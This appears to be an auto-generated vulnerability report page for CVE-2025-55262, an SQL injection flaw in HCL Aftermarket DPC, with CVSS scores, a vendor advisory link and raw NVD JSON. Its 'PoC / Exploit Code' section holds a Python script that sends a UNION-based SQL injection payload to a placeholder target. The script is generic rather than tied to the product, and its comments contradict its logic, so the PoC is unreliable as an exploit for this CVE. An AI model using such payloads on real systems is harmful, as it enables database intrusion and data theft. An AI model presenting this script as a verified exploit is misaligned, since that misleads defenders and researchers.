Security Vulnerability Report
CVE-2025-55262 CVSS 8.3 HIGH

CVE-2025-55262

Published: 2026-03-26 14:16:08
Last Modified: 2026-03-26 20:00:29

Description

HCL Aftermarket DPC is affected by SQL Injection, which allows an attacker to exploit this vulnerability to retrieve sensitive information from the database.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:* - VULNERABLE
HCL Aftermarket DPC (all affected versions; see the vendor advisory for specifics)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def check_sqli(target_url):
    # Construct a payload for error-based SQL injection
    # The payload attempts to break the SQL syntax and generate a database error
    payload = "1' AND 1=1 UNION SELECT NULL,@@version,NULL-- -"
    # Example parameter name, usually requires fuzzing to identify
    params = {
        "id": payload
    }
    try:
        response = requests.get(target_url, params=params, timeout=10)
        # Check for common SQL error messages in response
        if "syntax error" in response.text or "mysql_fetch" in response.text or "ORA-" in response.text:
            print("[+] Potential SQL Injection found at: {}".format(target_url))
            print("[+] Payload: {}".format(payload))
        else:
            print("[-] No obvious SQL error detected.")
    except Exception as e:
        print("[-] Error connecting to target: {}".format(e))


if __name__ == "__main__":
    # Replace with actual vulnerable endpoint
    url = "http://target-ip:port/vulnerable_page"
    check_sqli(url)
```

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55262", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:07.863", "lastModified": "2026-03-26T20:00:28.643", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Aftermarket DPC is affected by SQL Injection which allows attacker to exploit this vulnerability to retrieve sensitive information from the database."}, {"lang": "es", "value": "HCL Aftermarket DPC se ve afectado por inyección SQL, lo que permite al atacante explotar esta vulnerabilidad para recuperar información sensible de la base de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "C71E5E64-ED4C-4763-8A74-5F9DDCFD13DA"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}